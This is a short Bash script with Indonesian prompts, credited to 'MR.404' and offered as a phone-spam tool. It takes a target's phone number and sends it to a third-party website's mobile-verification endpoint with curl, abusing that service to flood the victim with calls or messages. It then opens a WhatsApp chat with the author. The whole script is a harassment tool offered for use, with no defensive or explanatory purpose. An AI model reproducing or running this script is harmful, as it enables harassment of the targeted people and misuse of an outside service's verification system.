#!bin/bash
clear
echo "****************************"
 
echo "____________________________"
echo "PEMBUAT RAIHAN/MR.404"
echo "____________________________"
echo "****************************"
figlet Telp | lolcat
echo "::::::::::::::::::::::::::::::"
echo '
[1], telepon spam
[2], keluar & kontak admin
'
echo "::::::::::::::::::::::::::::::"
echo
read -p "masukan pilihan kalian lurd : " pil
if [[ $pil == 1 ]]; then
read -p "Masukan No Target contoh:89528100123  : " nomor
link="https://id.jagreward.com/member/verify-mobile/$nomor"
curl -s $link
xdg-open 'https://wa.me/6282331072836/?text=Assalamualaikum+Apa+kabar+MR.404'
else
echo "thanks ya lurd udah pakai tools MR.404"
echo "chat admin dulu"
xdg-open 'https://wa.me/6282331072836/?text=Assalamualaikum+Apa+kabar+MR.404'
exit
fi
echo
